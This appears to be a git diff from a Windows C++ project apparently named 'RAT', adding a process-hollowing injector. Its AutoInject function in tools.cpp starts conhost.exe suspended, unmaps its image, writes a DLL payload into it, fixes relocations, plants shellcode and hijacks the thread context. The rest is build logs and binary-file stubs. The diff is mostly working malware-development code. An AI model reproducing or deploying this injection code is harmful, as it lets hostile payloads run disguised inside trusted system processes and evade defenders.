diff --git a/Debug/FunDLL.exp b/Debug/FunDLL.exp
index 365888f..6f1fe7a 100644
Binary files a/Debug/FunDLL.exp and b/Debug/FunDLL.exp differ
diff --git a/Debug/FunDLL.iobj b/Debug/FunDLL.iobj
deleted file mode 100644
index 18ce4a4..0000000
Binary files a/Debug/FunDLL.iobj and /dev/null differ
diff --git a/Debug/FunDLL.ipdb b/Debug/FunDLL.ipdb
deleted file mode 100644
index 2099e96..0000000
Binary files a/Debug/FunDLL.ipdb and /dev/null differ
diff --git a/Debug/FunDLL.pdb b/Debug/FunDLL.pdb
deleted file mode 100644
index 5df122a..0000000
Binary files a/Debug/FunDLL.pdb and /dev/null differ
diff --git a/Debug/Injector.pdb b/Debug/Injector.pdb
index c69c382..5f5e757 100644
Binary files a/Debug/Injector.pdb and b/Debug/Injector.pdb differ
diff --git a/Debug/Loader.pdb b/Debug/Loader.pdb
index 693e8ed..5191b40 100644
Binary files a/Debug/Loader.pdb and b/Debug/Loader.pdb differ
diff --git a/Dll/Debug/Dll.log b/Dll/Debug/Dll.log
index 5e221a8..9b42e74 100644
--- a/Dll/Debug/Dll.log
+++ b/Dll/Debug/Dll.log
@@ -1,8 +1,5 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
- fundll.cpp
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
- Generating code
- All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
- Finished generating code
- Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll
+tools.obj : error LNK2001: unresolved external symbol _NtQueryInformationProcess@20
+C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll : fatal error LNK1120: 1 unresolved externals
diff --git a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog
index 4682923..9059f15 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/CL.read.1.tlog b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog
index 8d47c28..4e617ff 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.read.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/CL.write.1.tlog b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog
index 27f4603..bc1eb33 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.write.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog
deleted file mode 100644
index b4bb458..0000000
Binary files a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog and /dev/null differ
diff --git a/Dll/Debug/FunDLL.tlog/link.command.1.tlog b/Dll/Debug/FunDLL.tlog/link.command.1.tlog
index ea9fd82..46b134b 100644
Binary files a/Dll/Debug/FunDLL.tlog/link.command.1.tlog and b/Dll/Debug/FunDLL.tlog/link.command.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/link.read.1.tlog b/Dll/Debug/FunDLL.tlog/link.read.1.tlog
index d66d11c..46b134b 100644
Binary files a/Dll/Debug/FunDLL.tlog/link.read.1.tlog and b/Dll/Debug/FunDLL.tlog/link.read.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/link.write.1.tlog b/Dll/Debug/FunDLL.tlog/link.write.1.tlog
index 1b566d3..46b134b 100644
Binary files a/Dll/Debug/FunDLL.tlog/link.write.1.tlog and b/Dll/Debug/FunDLL.tlog/link.write.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/unsuccessfulbuild b/Dll/Debug/FunDLL.tlog/unsuccessfulbuild
new file mode 100644
index 0000000..e69de29
diff --git a/Dll/Debug/vc141.pdb b/Dll/Debug/vc141.pdb
index 6039950..447dc9b 100644
Binary files a/Dll/Debug/vc141.pdb and b/Dll/Debug/vc141.pdb differ
diff --git a/Dll/Dll.vcxproj b/Dll/Dll.vcxproj
index 439f48f..4b50303 100644
--- a/Dll/Dll.vcxproj
+++ b/Dll/Dll.vcxproj
@@ -140,6 +140,10 @@
+
+
+
+
diff --git a/Dll/Dll.vcxproj.filters b/Dll/Dll.vcxproj.filters
index f9f4109..b7a0834 100644
--- a/Dll/Dll.vcxproj.filters
+++ b/Dll/Dll.vcxproj.filters
@@ -18,5 +18,13 @@
Source Files
+
+ Source Files
+
+
+
+
+ Header Files
+
\ No newline at end of file
diff --git a/Dll/fundll.cpp b/Dll/fundll.cpp
index 2eab02b..ae31cf6 100644
--- a/Dll/fundll.cpp
+++ b/Dll/fundll.cpp
@@ -1,23 +1,42 @@
-#include
+#include "tools.h"
+BOOL was_dllmain_called = FALSE;
+DWORD dll_param;
+
+LPSTR target_path = "C:\\Windows\\System32\\conhost.exe";
+
+extern "C" __declspec(dllexport) void FunEntry() {
+ char dll_path[MAX_PATH];
+ DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH);
+ char test[1024];
+ wsprintfA(test, "%s", dll_path);
+ MessageBoxA(0, test, "", 0);
+ // inject dll
+ Tools::AutoInject(target_path, dll_path);
+}
BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
+ dll_param = (DWORD)Base;
+ was_dllmain_called = TRUE;
+
switch (Callback) {
case DLL_PROCESS_ATTACH:
-
+
break;
case DLL_PROCESS_DETACH:
- break;
- default:
-
break;
}
- return 1;
+ return TRUE;
}
-extern "C" __declspec(dllexport) int FunEntry() {
- char exe[MAX_PATH + 1];
- GetModuleFileNameA(0, exe, sizeof(exe));
- MessageBoxA(0, exe, "I am inside: ", 0);
- return 0;
+extern "C" __declspec(dllexport) void MainBitch() {
+ if (was_dllmain_called) {
+ while (TRUE) {
+ char exe[MAX_PATH + 1];
+ GetModuleFileNameA(0, exe, sizeof(exe));
+ MessageBoxA(0, exe, "I am inside: ", 0);
+ }
+ } else {
+ MessageBoxA(NULL, "DLLMain was not called", NULL, 0);
+ }
}
\ No newline at end of file
diff --git a/Dll/tools.cpp b/Dll/tools.cpp
new file mode 100644
index 0000000..c6ad22a
--- /dev/null
+++ b/Dll/tools.cpp
@@ -0,0 +1,162 @@
+#include "tools.h"
+#include
+
+using NtUnmapViewOfSection = NTSTATUS(WINAPI*)(HANDLE, PVOID);
+
+typedef struct BASE_RELOCATION_BLOCK {
+ DWORD PageAddress;
+ DWORD BlockSize;
+} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;
+
+typedef struct BASE_RELOCATION_ENTRY {
+ USHORT Offset : 12;
+ USHORT Type : 4;
+} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;
+
+DWORD ConvertVirtualAddressToRawAddress(DWORD virtual_address, LPVOID file) {
+ PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER) file;
+ PIMAGE_SECTION_HEADER section = (PIMAGE_SECTION_HEADER)((DWORD)file + dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
+
+ while (virtual_address > section->VirtualAddress + section->Misc.VirtualSize)
+ section++;
+
+ DWORD offset = virtual_address - section->VirtualAddress;
+ DWORD raw_address = offset + section->PointerToRawData;
+ return raw_address;
+}
+
+int Tools::AutoInject(LPSTR target, LPCSTR payload) {
+ LPSTARTUPINFOA startup_info = new STARTUPINFOA();
+ LPPROCESS_INFORMATION process_info = new PROCESS_INFORMATION();
+ PROCESS_BASIC_INFORMATION *process_basic_info = new PROCESS_BASIC_INFORMATION();
+
+ BOOL process_created = CreateProcessA(NULL, target, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, startup_info, process_info);
+ if (process_created == TRUE) {
+ HANDLE target_process = process_info->hProcess;
+ if (target_process != INVALID_HANDLE_VALUE) {
+ DWORD return_lenght = 0;
+ NtQueryInformationProcess(target_process, ProcessBasicInformation, process_basic_info, sizeof(PROCESS_BASIC_INFORMATION), &return_lenght);
+ DWORD image_base_offset = (DWORD)process_basic_info->PebBaseAddress + 8;
+
+ LPVOID destination_image_base = 0;
+ SIZE_T bytes_read = NULL;
+ BOOL process_read = ReadProcessMemory(target_process, (LPCVOID)image_base_offset, &destination_image_base, 4, &bytes_read);
+
+ if (process_read == TRUE && destination_image_base != ERROR) {
+ HANDLE dll_file = CreateFileA(payload, GENERIC_READ, NULL, NULL, OPEN_ALWAYS, NULL, NULL);
+ if (dll_file != INVALID_HANDLE_VALUE) {
+ DWORD dll_size = GetFileSize(dll_file, NULL);
+ LPDWORD file_bytes_read = 0;
+ LPVOID dll_buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dll_size);
+ if (dll_buffer != ERROR) {
+ DWORD ss = 0;
+ BOOL dll_read = ReadFile(dll_file, dll_buffer, dll_size, &ss, NULL);
+
+ if (dll_read == TRUE) {
+
+ PIMAGE_DOS_HEADER dll_image_dos_header = (PIMAGE_DOS_HEADER)dll_buffer;
+ PIMAGE_NT_HEADERS dll_image_nt_headers = (PIMAGE_NT_HEADERS)((DWORD)dll_buffer + dll_image_dos_header->e_lfanew);
+ SIZE_T dll_image_size = dll_image_nt_headers->OptionalHeader.SizeOfImage;
+
+ NtUnmapViewOfSection unmap_section = (NtUnmapViewOfSection)GetProcAddress(GetModuleHandleA("ntdll"), "NtUnmapViewOfSection");
+ if (NT_SUCCESS(unmap_section(target_process, destination_image_base))) {
+ LPVOID new_destination_image_base = VirtualAllocEx(target_process, destination_image_base, dll_image_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+ destination_image_base = new_destination_image_base;
+
+ DWORD delta_image_base = (DWORD)destination_image_base - dll_image_nt_headers->OptionalHeader.ImageBase;
+
+ dll_image_nt_headers->OptionalHeader.ImageBase = (DWORD)destination_image_base;
+ WriteProcessMemory(target_process, new_destination_image_base, dll_buffer, dll_image_nt_headers->OptionalHeader.SizeOfHeaders, NULL);
+
+ PIMAGE_SECTION_HEADER dll_image_section_header = (PIMAGE_SECTION_HEADER)((DWORD)dll_buffer + dll_image_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
+ PIMAGE_SECTION_HEADER old_dll_section_header = dll_image_section_header;
+
+ for (int i = 0; i < dll_image_nt_headers->FileHeader.NumberOfSections; i++) {
+ PVOID destination_section_location = (PVOID)((DWORD)destination_image_base + dll_image_section_header->VirtualAddress);
+ PVOID source_section_location = (PVOID)((DWORD)dll_buffer + dll_image_section_header->PointerToRawData);
+ WriteProcessMemory(target_process, destination_section_location, source_section_location, dll_image_section_header->SizeOfRawData, NULL);
+ dll_image_section_header++;
+ }
+
+ // get FunEntry from exported function address
+ PIMAGE_EXPORT_DIRECTORY image_export_directory = (PIMAGE_EXPORT_DIRECTORY)((DWORD)dll_buffer + ConvertVirtualAddressToRawAddress((DWORD)dll_image_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress, dll_buffer));
+ PDWORD pEAT = (DWORD*)((DWORD)dll_buffer + ConvertVirtualAddressToRawAddress(image_export_directory->AddressOfFunctions, dll_buffer));
+
+ //pEAT[0] - 1st exported function
+ //pEAT[1] - 2nd exported function
+
+ IMAGE_DATA_DIRECTORY relocation_table = dll_image_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
+ dll_image_section_header = old_dll_section_header;
+
+ for (int x = 0; x < dll_image_nt_headers->FileHeader.NumberOfSections; x++) {
+ BYTE* reloc_section_name = (BYTE*)".reloc";
+ if (memcmp(dll_image_section_header->Name, reloc_section_name, 5) != 0) {
+ dll_image_section_header++;
+ continue;
+ }
+
+ DWORD source_relocation_table_raw = dll_image_section_header->PointerToRawData;
+ DWORD relocation_offset = 0;
+
+ while (relocation_offset < relocation_table.Size) {
+ PBASE_RELOCATION_BLOCK relocation_block = (PBASE_RELOCATION_BLOCK)((DWORD)dll_buffer + source_relocation_table_raw + relocation_offset);
+ relocation_offset += sizeof(PBASE_RELOCATION_BLOCK);
+ DWORD relocation_counts = (relocation_block->BlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);
+ PBASE_RELOCATION_ENTRY relocation_entries = (PBASE_RELOCATION_ENTRY)((DWORD)dll_buffer + source_relocation_table_raw + relocation_offset);
+
+ for (DWORD a = 0; a < relocation_counts; a++) {
+ relocation_offset += sizeof(BASE_RELOCATION_ENTRY);
+ if (relocation_entries[a].Type == 0)
+ continue;
+
+ DWORD patched_address = relocation_block->PageAddress + relocation_entries[a].Offset;
+ DWORD patched_buffer = 0;
+ DWORD bytes_read = 0;
+
+ ReadProcessMemory(target_process, (LPCVOID)((DWORD)destination_image_base + patched_address), &patched_buffer, sizeof(DWORD), &bytes_read);
+ patched_buffer += delta_image_base;
+ WriteProcessMemory(target_process, (PVOID)((DWORD)destination_image_base + patched_address), &patched_buffer, sizeof(DWORD), file_bytes_read);
+ }
+ }
+ }
+
+ LPCONTEXT context = new CONTEXT();
+ context->ContextFlags = CONTEXT_INTEGER;
+ GetThreadContext(process_info->hThread, context);
+
+ // machine code -> opcodes
+ // code for exec DllMain when injected
+ BYTE code[] = {
+ 0x68, 0xDD, 0xDD, 0xDD, 0xDD, 0xDD,
+ 0x68, 0xDD, 0xDD, 0xDD, 0xDD, 0xDD,
+ 0x68, 0xDD, 0xDD, 0xDD, 0xDD, 0xDD,
+ 0x68, 0xDD, 0xDD, 0xDD, 0xDD, 0xDD,
+ 0xB8, 0xDD, 0xDD, 0xDD, 0xDD, 0xDD,
+ 0xFF, 0xE0 // jmp eax
+ };
+
+ *((PDWORD)(code + 1)) = 0; // 3rd param
+ *((PDWORD)(code + 6)) = 1; // 2nd param
+ *((PDWORD)(code + 11)) = (DWORD)destination_image_base; // 1st param
+ *((PDWORD)(code + 16)) = (DWORD)destination_image_base + pEAT[1];
+ *((PDWORD)(code + 21)) = (DWORD)destination_image_base + dll_image_nt_headers->OptionalHeader.AddressOfEntryPoint;
+
+ LPVOID address_buffer = VirtualAllocEx(target_process, NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+ BOOL success = WriteProcessMemory(target_process, address_buffer, code, sizeof(code), NULL);
+
+ if (success == TRUE) {
+ context->Eax = (DWORD)address_buffer;
+ SetThreadContext(process_info->hThread, context);
+ ResumeThread(process_info->hThread);
+ }
+ return 0;
+ }
+ }
+ }
+ }
+ CloseHandle(dll_file);
+ }
+ }
+ CloseHandle(target_process);
+ }
+}
\ No newline at end of file
diff --git a/Dll/tools.h b/Dll/tools.h
new file mode 100644
index 0000000..8d523cf
--- /dev/null
+++ b/Dll/tools.h
@@ -0,0 +1,7 @@
+#include
+
+#pragma once
+
+namespace Tools {
+ int AutoInject(LPSTR target_process, LPCSTR payload);
+}
\ No newline at end of file
diff --git a/Injector/Debug/Injector.ilk b/Injector/Debug/Injector.ilk
index 5de5b6b..a761978 100644
Binary files a/Injector/Debug/Injector.ilk and b/Injector/Debug/Injector.ilk differ
diff --git a/Injector/Debug/Injector.tlog/link.read.1.tlog b/Injector/Debug/Injector.tlog/link.read.1.tlog
index 4073d96..e107641 100644
Binary files a/Injector/Debug/Injector.tlog/link.read.1.tlog and b/Injector/Debug/Injector.tlog/link.read.1.tlog differ
diff --git a/Injector/Debug/vc143.idb b/Injector/Debug/vc143.idb
index 71e54e2..d67335b 100644
Binary files a/Injector/Debug/vc143.idb and b/Injector/Debug/vc143.idb differ
diff --git a/Injector/Debug/vc143.pdb b/Injector/Debug/vc143.pdb
index c2807b3..6c5c365 100644
Binary files a/Injector/Debug/vc143.pdb and b/Injector/Debug/vc143.pdb differ
diff --git a/Loader/Debug/Loader.tlog/link.read.1.tlog b/Loader/Debug/Loader.tlog/link.read.1.tlog
index f03f114..4a1d873 100644
Binary files a/Loader/Debug/Loader.tlog/link.read.1.tlog and b/Loader/Debug/Loader.tlog/link.read.1.tlog differ
diff --git a/Loader/Debug/vc141.pdb b/Loader/Debug/vc141.pdb
index 02fe3bb..d45b5fc 100644
Binary files a/Loader/Debug/vc141.pdb and b/Loader/Debug/vc141.pdb differ